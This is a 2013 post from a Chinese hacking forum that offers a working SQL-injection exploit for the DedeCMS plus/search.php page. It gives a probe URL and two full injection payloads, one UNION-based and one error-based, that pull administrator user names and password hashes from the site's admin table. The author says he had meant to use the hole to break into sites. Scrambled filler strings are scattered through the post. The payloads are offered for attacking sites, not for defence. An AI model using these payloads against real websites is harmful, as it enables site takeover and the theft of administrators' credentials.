中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
: D5 e3 B5 z# R! l* M. N8 K
' ^- ^3 ?" ?" a1 k" b/ t
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
" t# B2 T+ t$ E7 A' `: r( `
# M$ E& @1 \& F& b7 B1 d5 J6 m/ w5 R
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
4 j* x3 U4 u9 ], C% }4 V8 X& ]' g
, A; |8 i1 y7 z8 @3 j: P
我一般是这样测试的:
' r9 Q0 F6 k0 w( i- `( j1 U
# P3 B3 z0 ~3 W" U& p, ]; P
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
+ ^3 h8 y0 D( r
! ?6 C8 z& r9 Y- L( Z0 a
转载不加作者名的没JJ
+ [. ^. ?. \0 x# J0 P j& C
5 s* a& n; z) _
作者:鬼哥
3 P" o; H. g9 F0 i/ o
/ D6 _0 y2 z2 p- E
1 C X7 r6 o- U/ t* v6 G
! q& ?' c* y9 b9 M6 n' q
看结果如果提示
/ W5 O: {& \8 L2 K% r, `$ H
5 F" E0 A, n, X3 N, d
Safe Alert: Request Error step 2 !
7 P0 V. {9 m W
3 W; S, k2 F* }
那么直接用下面的exp
5 B) |, }: z. j
: [( V' T8 l* O' m
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
9 w; n# G$ v- p. m! s
; \& b: t+ u. T6 k7 V/ t, m" y# L
# F, }* Z) v$ @* h, G0 P- \
看结果如果提示
1 d" V( r% a: l+ ~ Y. n
- w2 z$ N7 R! \9 D/ B
Safe Alert: Request Error step 1 !
, G+ F2 C! R; I/ d+ E
! A; t7 o) E5 I
那么直接用下面的exp
' E. G: {1 u5 o' [6 W
8 I( j- m8 D8 \; J2 e8 D: V3 Y
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
4 r5 s7 B# A! @
0 {+ f2 i( g( I- X: O
# b- M& s% c' y$ D1 W4 r6 ~
如果正常显示证明漏洞不存在了。
2 V1 c$ d& z& _& \- d) W4 Q ~
! r' h9 t5 y- p! J7 Z0 I
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2